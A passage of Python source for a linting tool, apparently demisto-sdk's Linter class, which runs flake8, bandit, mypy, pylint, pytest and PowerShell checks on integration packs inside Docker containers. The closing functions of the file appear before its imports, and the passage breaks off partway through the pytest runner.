logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
exit_code = RERUN
return exit_code, output
def _update_support_level(self):
pack_dir = self._pack_abs_dir.parent if self._pack_abs_dir.parts[-1] == INTEGRATIONS_DIR else \
self._pack_abs_dir.parent.parent
pack_meta_content: Dict = json.load((pack_dir / PACKS_PACK_META_FILE_NAME).open())
self._facts['support_level'] = pack_meta_content.get('support')
if self._facts['support_level'] == 'partner' and pack_meta_content.get('Certification'):
self._facts['support_level'] = 'certified partner'
def _docker_run_pwsh_test(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Powershell tests in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after excution finished
Returns:
int: 0 on successful, errors 1, neet to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Powershell test - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pwsh-test"
# Check if previous run left container a live if it do, we remove it
self._docker_remove_container(container_name)
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj: docker.models.containers.Container = self._docker_client.containers.run(name=container_name,
image=test_image,
command=build_pwsh_test_command(),
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code:
# 1-fatal message issued
# 2-Error message issued
logger.info(f"{log_prompt} - Finished errors found")
output = container_log
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
exit_code = RERUN
return exit_code, output
def _get_commands_list(self, script_obj: dict):
""" Get all commands from yml file of the pack
Args:
script_obj(dict): the script section of the yml file.
Returns:
list: list of all commands
"""
commands_list = []
try:
commands_obj = script_obj.get('commands', {})
for command in commands_obj:
commands_list.append(command.get('name', ''))
except Exception:
logger.debug("Failed getting the commands from the yml file")
return commands_list
| # STD python packages
import copy
import hashlib
import io
import json
import logging
import os
import platform
import time
import traceback
from copy import deepcopy
from typing import Any, Dict, List, Optional, Tuple
# 3-rd party packages
import docker
import docker.errors
import docker.models.containers
import requests.exceptions
import urllib3.exceptions
from demisto_sdk.commands.common.constants import (INTEGRATIONS_DIR,
PACKS_PACK_META_FILE_NAME,
TYPE_PWSH, TYPE_PYTHON)
# Local packages
from demisto_sdk.commands.common.tools import (get_all_docker_images,
run_command_os)
from demisto_sdk.commands.lint.commands_builder import (
build_bandit_command, build_flake8_command, build_mypy_command,
build_pwsh_analyze_command, build_pwsh_test_command, build_pylint_command,
build_pytest_command, build_vulture_command, build_xsoar_linter_command)
from demisto_sdk.commands.lint.helpers import (EXIT_CODES, FAIL, RERUN, RL,
SUCCESS, WARNING,
add_tmp_lint_files,
add_typing_module,
get_file_from_container,
get_python_version_from_image,
pylint_plugin,
split_warnings_errors,
stream_docker_container_output)
from jinja2 import Environment, FileSystemLoader, exceptions
from ruamel.yaml import YAML
from wcmatch.pathlib import NEGATE, Path
logger = logging.getLogger('demisto-sdk')
class Linter:
""" Linter used to activate lint command on single package
Attributes:
pack_dir(Path): Pack to run lint on.
content_repo(Path): Git repo object of content repo.
req_2(list): requirements for docker using python2.
req_3(list): requirements for docker using python3.
docker_engine(bool): Whether docker engine detected by docker-sdk.
"""
def __init__(self, pack_dir: Path, content_repo: Path, req_3: list, req_2: list, docker_engine: bool):
self._req_3 = req_3
self._req_2 = req_2
self._content_repo = content_repo
self._pack_abs_dir = pack_dir
self._pack_name = None
# Docker client init
if docker_engine:
self._docker_client: docker.DockerClient = docker.from_env()
self._docker_hub_login = self._docker_login()
# Facts gathered regarding pack lint and test
self._facts: Dict[str, Any] = {
"images": [],
"python_version": 0,
"env_vars": {},
"test": False,
"lint_files": [],
"support_level": None,
"is_long_running": False,
"lint_unittest_files": [],
"additional_requirements": [],
"docker_engine": docker_engine,
"is_script": False,
"commands": None
}
# Pack lint status object - visualize it
self._pkg_lint_status: Dict = {
"pkg": None,
"pack_type": None,
"path": str(self._content_repo),
"errors": [],
"images": [],
"flake8_errors": None,
"XSOAR_linter_errors": None,
"bandit_errors": None,
"mypy_errors": None,
"vulture_errors": None,
"flake8_warnings": None,
"XSOAR_linter_warnings": None,
"bandit_warnings": None,
"mypy_warnings": None,
"vulture_warnings": None,
"exit_code": SUCCESS,
"warning_code": SUCCESS,
}
def run_dev_packages(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_pylint: bool, no_vulture: bool,
no_xsoar_linter: bool, no_pwsh_analyze: bool, no_pwsh_test: bool, no_test: bool, modules: dict,
keep_container: bool, test_xml: str) -> dict:
""" Run lint and tests on single package
Performing the follow:
1. Run the lint on OS - flake8, bandit, mypy.
2. Run in package docker - pylint, pytest.
Args:
no_flake8(bool): Whether to skip flake8
no_bandit(bool): Whether to skip bandit
no_mypy(bool): Whether to skip mypy
no_vulture(bool): Whether to skip vulture
no_pylint(bool): Whether to skip pylint
no_test(bool): Whether to skip pytest
no_pwsh_analyze(bool): Whether to skip powershell code analyzing
no_pwsh_test(bool): whether to skip powershell tests
modules(dict): Mandatory modules to locate in pack path (CommonServerPython.py etc)
keep_container(bool): Whether to keep the test container
test_xml(str): Path for saving pytest xml results
Returns:
dict: lint and test all status, pkg status)
"""
# Gather information for lint check information
skip = self._gather_facts(modules)
# If not python pack - skip pack
if skip:
return self._pkg_lint_status
try:
# Locate mandatory files in pack path - for more info checkout the context manager LintFiles
with add_tmp_lint_files(content_repo=self._content_repo, # type: ignore
pack_path=self._pack_abs_dir,
lint_files=self._facts["lint_files"],
modules=modules,
pack_type=self._pkg_lint_status["pack_type"]):
# Run lint check on host - flake8, bandit, mypy
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._run_lint_in_host(no_flake8=no_flake8,
no_bandit=no_bandit,
no_mypy=no_mypy,
no_vulture=no_vulture,
no_xsoar_linter=no_xsoar_linter)
# Run lint and test check on pack docker image
if self._facts["docker_engine"]:
self._run_lint_on_docker_image(no_pylint=no_pylint,
no_test=no_test,
no_pwsh_analyze=no_pwsh_analyze,
no_pwsh_test=no_pwsh_test,
keep_container=keep_container,
test_xml=test_xml)
except Exception as ex:
err = f'{self._pack_abs_dir}: Unexpected fatal exception: {str(ex)}'
logger.error(f"{err}. Traceback: {traceback.format_exc()}")
self._pkg_lint_status["errors"].append(err)
self._pkg_lint_status['exit_code'] += FAIL
return self._pkg_lint_status
def _gather_facts(self, modules: dict) -> bool:
""" Gathering facts about the package - python version, docker images, valid docker image, yml parsing
Args:
modules(dict): Test mandatory modules to be ignore in lint check
Returns:
bool: Indicating if to continue further or not, if False exit Thread, Else continue.
"""
# Looking for pkg yaml
yml_file: Optional[Path] = self._pack_abs_dir.glob([r'*.yaml', r'*.yml', r'!*unified*.yml'], flags=NEGATE)
if not yml_file:
logger.info(f"{self._pack_abs_dir} - Skipping no yaml file found {yml_file}")
self._pkg_lint_status["errors"].append('Unable to find yml file in package')
return True
else:
try:
yml_file = next(yml_file)
except StopIteration:
return True
# Get pack name
self._pack_name = yml_file.stem
log_prompt = f"{self._pack_name} - Facts"
self._pkg_lint_status["pkg"] = yml_file.stem
logger.info(f"{log_prompt} - Using yaml file {yml_file}")
# Parsing pack yaml - in order to verify if check needed
try:
script_obj: Dict = {}
yml_obj: Dict = YAML().load(yml_file)
if isinstance(yml_obj, dict):
script_obj = yml_obj.get('script', {}) if isinstance(yml_obj.get('script'), dict) else yml_obj
self._facts['is_script'] = True if 'Scripts' in yml_file.parts else False
self._facts['is_long_running'] = script_obj.get('longRunning')
self._facts['commands'] = self._get_commands_list(script_obj)
self._pkg_lint_status["pack_type"] = script_obj.get('type')
except (FileNotFoundError, IOError, KeyError):
self._pkg_lint_status["errors"].append('Unable to parse package yml')
return True
# return no check needed if not python pack
if self._pkg_lint_status["pack_type"] not in (TYPE_PYTHON, TYPE_PWSH):
logger.info(f"{log_prompt} - Skipping due to not Python, Powershell package - Pack is"
f" {self._pkg_lint_status['pack_type']}")
return True
# Docker images
if self._facts["docker_engine"]:
logger.info(f"{log_prompt} - Pulling docker images, can take up to 1-2 minutes if not exists locally ")
self._facts["images"] = [[image, -1] for image in get_all_docker_images(script_obj=script_obj)]
# Gather environment variables for docker execution
self._facts["env_vars"] = {
"CI": os.getenv("CI", False),
"DEMISTO_LINT_UPDATE_CERTS": os.getenv('DEMISTO_LINT_UPDATE_CERTS', "yes")
}
lint_files = set()
# Facts for python pack
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._update_support_level()
if self._facts["docker_engine"]:
# Getting python version from docker image - verifying if not valid docker image configured
for image in self._facts["images"]:
py_num: float = get_python_version_from_image(image=image[0])
image[1] = py_num
logger.info(f"{self._pack_name} - Facts - {image[0]} - Python {py_num}")
if not self._facts["python_version"]:
self._facts["python_version"] = py_num
# Checking whatever *test* exists in package
self._facts["test"] = True if next(self._pack_abs_dir.glob([r'test_*.py', r'*_test.py']),
None) else False
if self._facts["test"]:
logger.info(f"{log_prompt} - Tests found")
else:
logger.info(f"{log_prompt} - Tests not found")
# Gather package requirements embedded test-requirements.py file
test_requirements = self._pack_abs_dir / 'test-requirements.txt'
if test_requirements.exists():
try:
additional_req = test_requirements.read_text(encoding='utf-8').strip().split('\n')
self._facts["additional_requirements"].extend(additional_req)
logger.info(f"{log_prompt} - Additional package Pypi packages found - {additional_req}")
except (FileNotFoundError, IOError):
self._pkg_lint_status["errors"].append('Unable to parse test-requirements.txt in package')
elif not self._facts["python_version"]:
# get python version from yml
pynum = 3.7 if (script_obj.get('subtype', 'python3') == 'python3') else 2.7
self._facts["python_version"] = pynum
logger.info(f"{log_prompt} - Using python version from yml: {pynum}")
# Get lint files
lint_files = set(self._pack_abs_dir.glob(["*.py", "!__init__.py", "!*.tmp"],
flags=NEGATE))
# Facts for Powershell pack
elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
# Get lint files
lint_files = set(
self._pack_abs_dir.glob(["*.ps1", "!*Tests.ps1", "CommonServerPowerShell.ps1", "demistomock.ps1'"],
flags=NEGATE))
# Add CommonServer to the lint checks
if 'commonserver' in self._pack_abs_dir.name.lower():
# Powershell
if self._pkg_lint_status["pack_type"] == TYPE_PWSH:
self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPowerShell.ps1')]
# Python
elif self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPython.py')]
else:
test_modules = {self._pack_abs_dir / module.name for module in modules.keys()}
lint_files = lint_files.difference(test_modules)
self._facts["lint_files"] = list(lint_files)
if self._facts["lint_files"]:
for lint_file in self._facts["lint_files"]:
logger.info(f"{log_prompt} - Lint file {lint_file}")
else:
logger.info(f"{log_prompt} - Lint files not found")
self._split_lint_files()
return False
def _split_lint_files(self):
""" Remove unit test files from _facts['lint_files'] and put into their own list _facts['lint_unittest_files']
This is because not all lints should be done on unittest files.
"""
lint_files_list = deepcopy(self._facts["lint_files"])
for lint_file in lint_files_list:
if lint_file.name.startswith('test_') or lint_file.name.endswith('_test.py'):
self._facts['lint_unittest_files'].append(lint_file)
self._facts["lint_files"].remove(lint_file)
def _run_lint_in_host(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_vulture: bool,
no_xsoar_linter: bool):
""" Run lint check on host
Args:
no_flake8(bool): Whether to skip flake8.
no_bandit(bool): Whether to skip bandit.
no_mypy(bool): Whether to skip mypy.
no_vulture(bool): Whether to skip Vulture.
"""
warning = []
error = []
other = []
exit_code: int = 0
for lint_check in ["flake8", "XSOAR_linter", "bandit", "mypy", "vulture"]:
exit_code = SUCCESS
output = ""
if self._facts["lint_files"] or self._facts["lint_unittest_files"]:
if lint_check == "flake8" and not no_flake8:
flake8_lint_files = copy.deepcopy(self._facts["lint_files"])
# if there are unittest.py then we would run flake8 on them too.
if self._facts['lint_unittest_files']:
flake8_lint_files.extend(self._facts['lint_unittest_files'])
exit_code, output = self._run_flake8(py_num=self._facts["python_version"], lint_files=flake8_lint_files)
if self._facts["lint_files"]:
if lint_check == "XSOAR_linter" and not no_xsoar_linter:
exit_code, output = self._run_xsoar_linter(py_num=self._facts["python_version"],
lint_files=self._facts["lint_files"])
elif lint_check == "bandit" and not no_bandit:
exit_code, output = self._run_bandit(lint_files=self._facts["lint_files"])
elif lint_check == "mypy" and not no_mypy:
exit_code, output = self._run_mypy(py_num=self._facts["python_version"],
lint_files=self._facts["lint_files"])
elif lint_check == "vulture" and not no_vulture:
exit_code, output = self._run_vulture(py_num=self._facts["python_version"],
lint_files=self._facts["lint_files"])
# check for any exit code other than 0
if exit_code:
error, warning, other = split_warnings_errors(output)
if exit_code and warning:
self._pkg_lint_status["warning_code"] |= EXIT_CODES[lint_check]
self._pkg_lint_status[f"{lint_check}_warnings"] = "\n".join(warning)
if exit_code & FAIL:
self._pkg_lint_status["exit_code"] |= EXIT_CODES[lint_check]
# if the error were extracted correctly as they start with E
if error:
self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(error)
# if there were errors but they do not start with E
else:
self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(other)
def _run_flake8(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Runs flake8 in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Flake8"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_flake8_command(lint_files, py_num),
cwd=self._content_repo)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_xsoar_linter(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Runs Xsaor linter in pack dir
Args:
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Xsoar linter errors
"""
status = SUCCESS
FAIL_PYLINT = 0b10
with pylint_plugin(self._pack_abs_dir):
log_prompt = f"{self._pack_name} - XSOAR Linter"
logger.info(f"{log_prompt} - Start")
myenv = os.environ.copy()
if myenv.get('PYTHONPATH'):
myenv['PYTHONPATH'] += ':' + str(self._pack_abs_dir)
else:
myenv['PYTHONPATH'] = str(self._pack_abs_dir)
if self._facts['is_long_running']:
myenv['LONGRUNNING'] = 'True'
if py_num < 3:
myenv['PY2'] = 'True'
myenv['is_script'] = str(self._facts['is_script'])
# as Xsoar checker is a pylint plugin and runs as part of pylint code, we can not pass args to it.
# as a result we can use the env vars as a getway.
myenv['commands'] = ','.join([str(elem) for elem in self._facts['commands']]) \
if self._facts['commands'] else ''
stdout, stderr, exit_code = run_command_os(
command=build_xsoar_linter_command(lint_files, py_num, self._facts.get('support_level', 'base')),
cwd=self._pack_abs_dir, env=myenv)
if exit_code & FAIL_PYLINT:
logger.info(f"{log_prompt}- Finished errors found")
status = FAIL
if exit_code & WARNING:
logger.info(f"{log_prompt} - Finished warnings found")
if not status:
status = WARNING
# if pylint did not run and failure exit code has been returned from run commnad
elif exit_code & FAIL:
status = FAIL
# for contrib prs which are not merged from master and do not have pylint in dev-requirements-py2.
if os.environ.get('CI'):
stdout = "Xsoar linter could not run, Please merge from master"
else:
stdout = "Xsoar linter could not run, please make sure you have" \
" the necessary Pylint version for both py2 and py3"
logger.info(f"{log_prompt}- Finished errors found")
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
if not exit_code:
logger.info(f"{log_prompt} - Successfully finished")
return status, stdout
def _run_bandit(self, lint_files: List[Path]) -> Tuple[int, str]:
""" Run bandit in pack dir
Args:
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Bandit"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_bandit_command(lint_files),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_mypy(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Run mypy in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Mypy"
logger.info(f"{log_prompt} - Start")
with add_typing_module(lint_files=lint_files, python_version=py_num):
stdout, stderr, exit_code = run_command_os(command=build_mypy_command(files=lint_files, version=py_num),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_vulture(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Run mypy in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Vulture errors
"""
log_prompt = f"{self._pack_name} - Vulture"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_vulture_command(files=lint_files,
pack_path=self._pack_abs_dir,
py_num=py_num),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ''}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ''}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_lint_on_docker_image(self, no_pylint: bool, no_test: bool, no_pwsh_analyze: bool, no_pwsh_test: bool,
keep_container: bool, test_xml: str):
""" Run lint check on docker image
Args:
no_pylint(bool): Whether to skip pylint
no_test(bool): Whether to skip pytest
no_pwsh_analyze(bool): Whether to skip powershell code analyzing
no_pwsh_test(bool): whether to skip powershell tests
keep_container(bool): Whether to keep the test container
test_xml(str): Path for saving pytest xml results
"""
for image in self._facts["images"]:
# Docker image status - visualize
status = {
"image": image[0],
"image_errors": "",
"pylint_errors": "",
"pytest_errors": "",
"pytest_json": {},
"pwsh_analyze_errors": "",
"pwsh_test_errors": ""
}
# Creating image if pylint specified or found tests and tests specified
image_id = ""
errors = ""
for trial in range(2):
image_id, errors = self._docker_image_create(docker_base_image=image)
if not errors:
break
if image_id and not errors:
# Set image creation status
for check in ["pylint", "pytest", "pwsh_analyze", "pwsh_test"]:
exit_code = SUCCESS
output = ""
for trial in range(2):
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
# Perform pylint
if not no_pylint and check == "pylint" and self._facts["lint_files"]:
exit_code, output = self._docker_run_pylint(test_image=image_id,
keep_container=keep_container)
# Perform pytest
elif not no_test and self._facts["test"] and check == "pytest":
exit_code, output, test_json = self._docker_run_pytest(test_image=image_id,
keep_container=keep_container,
test_xml=test_xml)
status["pytest_json"] = test_json
elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
# Perform powershell analyze
if not no_pwsh_analyze and check == "pwsh_analyze" and self._facts["lint_files"]:
exit_code, output = self._docker_run_pwsh_analyze(test_image=image_id,
keep_container=keep_container)
# Perform powershell test
elif not no_pwsh_test and check == "pwsh_test":
exit_code, output = self._docker_run_pwsh_test(test_image=image_id,
keep_container=keep_container)
# If lint check perfrom and failed on reason related to enviorment will run twice,
# But it failing in second time it will count as test failure.
if (exit_code == RERUN and trial == 1) or exit_code == FAIL or exit_code == SUCCESS:
if exit_code in [RERUN, FAIL]:
self._pkg_lint_status["exit_code"] |= EXIT_CODES[check]
status[f"{check}_errors"] = output
break
else:
status["image_errors"] = str(errors)
self._pkg_lint_status["exit_code"] += EXIT_CODES["image"]
# Add image status to images
self._pkg_lint_status["images"].append(status)
try:
self._docker_client.images.remove(image_id)
except (docker.errors.ImageNotFound, docker.errors.APIError):
pass
def _docker_login(self) -> bool:
""" Login to docker-hub using environment variables:
1. DOCKERHUB_USER - User for docker hub.
2. DOCKERHUB_PASSWORD - Password for docker-hub.
Used in Circle-CI for pushing into repo devtestdemisto
Returns:
bool: True if logged in successfully.
"""
docker_user = os.getenv('DOCKERHUB_USER')
docker_pass = os.getenv('DOCKERHUB_PASSWORD')
try:
self._docker_client.login(username=docker_user,
password=docker_pass,
registry="https://index.docker.io/v1")
return self._docker_client.ping()
except docker.errors.APIError:
return False
def _docker_image_create(self, docker_base_image: List[Any]) -> Tuple[str, str]:
""" Create docker image:
1. Installing 'build base' if required in alpine images version - https://wiki.alpinelinux.org/wiki/GCC
2. Installing pypi packs - if only pylint required - only pylint installed otherwise all pytest and pylint
installed, packages which being install can be found in path demisto_sdk/commands/lint/dev_envs
3. The docker image build done by Dockerfile template located in
demisto_sdk/commands/lint/templates/dockerfile.jinja2
Args:
docker_base_image(list): docker image to use as base for installing dev deps and python version.
Returns:
str, str. image name to use and errors string.
"""
log_prompt = f"{self._pack_name} - Image create"
test_image_id = ""
# Get requirements file for image
requirements = []
if 2 < docker_base_image[1] < 3:
requirements = self._req_2
elif docker_base_image[1] > 3:
requirements = self._req_3
# Using DockerFile template
file_loader = FileSystemLoader(Path(__file__).parent / 'templates')
env = Environment(loader=file_loader, lstrip_blocks=True, trim_blocks=True, autoescape=True)
template = env.get_template('dockerfile.jinja2')
try:
dockerfile = template.render(image=docker_base_image[0],
pypi_packs=requirements + self._facts["additional_requirements"],
pack_type=self._pkg_lint_status["pack_type"],
copy_pack=False)
except exceptions.TemplateError as e:
logger.debug(f"{log_prompt} - Error when build image - {e.message()}")
return test_image_id, str(e)
# Trying to pull image based on dockerfile hash, will check if something changed
errors = ""
test_image_name = f'devtest{docker_base_image[0]}-{hashlib.md5(dockerfile.encode("utf-8")).hexdigest()}'
test_image = None
try:
logger.info(f"{log_prompt} - Trying to pull existing image {test_image_name}")
test_image = self._docker_client.images.pull(test_image_name)
except (docker.errors.APIError, docker.errors.ImageNotFound):
logger.info(f"{log_prompt} - Unable to find image {test_image_name}")
# Creatng new image if existing image isn't found
if not test_image:
logger.info(
f"{log_prompt} - Creating image based on {docker_base_image[0]} - Could take 2-3 minutes at first "
f"time")
try:
with io.BytesIO() as f:
f.write(dockerfile.encode('utf-8'))
f.seek(0)
self._docker_client.images.build(fileobj=f,
tag=test_image_name,
forcerm=True)
if self._docker_hub_login:
for trial in range(2):
try:
self._docker_client.images.push(test_image_name)
logger.info(f"{log_prompt} - Image {test_image_name} pushed to repository")
break
except (requests.exceptions.ConnectionError, urllib3.exceptions.ReadTimeoutError):
logger.info(f"{log_prompt} - Unable to push image {test_image_name} to repository")
except (docker.errors.BuildError, docker.errors.APIError, Exception) as e:
logger.critical(f"{log_prompt} - Build errors occurred {e}")
errors = str(e)
else:
logger.info(f"{log_prompt} - Found existing image {test_image_name}")
dockerfile_path = Path(self._pack_abs_dir / ".Dockerfile")
dockerfile = template.render(image=test_image_name,
copy_pack=True)
with open(file=dockerfile_path, mode="+x") as file:
file.write(str(dockerfile))
# we only do retries in CI env where docker build is sometimes flacky
build_tries = int(os.getenv('DEMISTO_SDK_DOCKER_BUILD_TRIES', 3)) if os.getenv('CI') else 1
for trial in range(build_tries):
try:
logger.info(f"{log_prompt} - Copy pack dir to image {test_image_name}")
docker_image_final = self._docker_client.images.build(path=str(dockerfile_path.parent),
dockerfile=dockerfile_path.stem,
forcerm=True)
test_image_name = docker_image_final[0].short_id
break
except Exception as e:
logger.exception(f"{log_prompt} - errors occurred when building image in dir {e}")
if trial >= build_tries:
errors = str(e)
else:
logger.info(f"{log_prompt} - sleeping 2 seconds and will retry build after")
time.sleep(2)
if dockerfile_path.exists():
dockerfile_path.unlink()
if test_image_id:
logger.info(f"{log_prompt} - Image {test_image_id} created successfully")
return test_image_name, errors
def _docker_remove_container(self, container_name: str):
try:
container_obj = self._docker_client.containers.get(container_name)
container_obj.remove(force=True)
except docker.errors.NotFound:
pass
except requests.exceptions.ChunkedEncodingError as err:
# see: https://github.com/docker/docker-py/issues/2696#issuecomment-721322548
if platform.system() != 'Darwin' or 'Connection broken' not in str(err):
raise
def _docker_run_pylint(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Pylint in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after execution finished
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Pylint - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pylint"
# Check if previous run left container a live if it do, we remove it
self._docker_remove_container(container_name)
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj: docker.models.containers.Container = self._docker_client.containers.run(
name=container_name,
image=test_image,
command=[
build_pylint_command(
self._facts["lint_files"], docker_version=self._facts.get('python_version'))
],
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"]
)
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code in [1, 2]:
# 1-fatal message issued
# 2-Error message issued
exit_code = FAIL
output = container_log
logger.info(f"{log_prompt} - Finished errors found")
elif container_exit_code in [4, 8, 16]:
# 4-Warning message issued
# 8-refactor message issued
# 16-convention message issued
logger.info(f"{log_prompt} - Successfully finished - warnings found")
exit_code = SUCCESS
elif container_exit_code == 32:
# 32-usage error
logger.critical(f"{log_prompt} - Finished - Usage error")
exit_code = RERUN
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run pylint - {e}")
exit_code = RERUN
output = str(e)
return exit_code, output
def _docker_run_pytest(self, test_image: str, keep_container: bool, test_xml: str) -> Tuple[int, str, dict]:
""" Run Pytest in created test image
Args:
test_image(str): Test image id/name
keep_container(bool): True if to keep container after execution finished
test_xml(str): Xml saving path
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Unit test json report
"""
log_prompt = f'{self._pack_name} - Pytest - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pytest"
# Check if previous run left container a live if it does, Remove it
self._docker_remove_container(container_name)
# Collect tests
exit_code = SUCCESS
output = ''
test_json = {}
try:
# Running pytest container
container_obj: docker.models.containers.Container = self._docker_client.containers.run(name=container_name,
image=test_image,
command=[
build_pytest_command(test_xml=test_xml, json=True)],
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# Waiting for container to be finished
container_status: dict = container_obj.wait(condition="exited")
# Getting container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code in [0, 1, 2, 5]:
# 0-All tests passed
# 1-Tests were collected and run but some of the tests failed
# 2-Test execution was interrupted by the user
# 5-No tests were collected
if test_xml:
test_data_xml = get_file_from_container(container_obj=container_obj,
container_path="/devwork/report_pytest.xml")
xml_apth = Path(test_xml) / f'{self._pack_name}_pytest.xml'
with open(file=xml_apth, mode='bw') as f:
f.write(test_data_xml) # type: ignore
test_json = json.loads(get_file_from_container(container_obj=container_obj,
container_path="/devwork/report_pytest.json",
encoding="utf-8"))
for test in test_json.get('report', {}).get("tests"):
if test.get("call", {}).get("longrepr"):
test["call"]["longrepr"] = test["call"]["longrepr"].split('\n')
if container_exit_code in [0, 5]:
logger.info(f"{log_prompt} - Successfully finished")
exit_code = SUCCESS
elif container_exit_code in [2]:
output = container_obj.logs().decode('utf-8')
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Finished errors found")
exit_code = FAIL
elif container_exit_code in [3, 4]:
# 3-Internal error happened while executing tests
# 4-pytest command line usage error
logger.critical(f"{log_prompt} - Usage error")
exit_code = RERUN
output = container_obj.logs().decode('utf-8')
# Remove container if not needed
if keep_container:
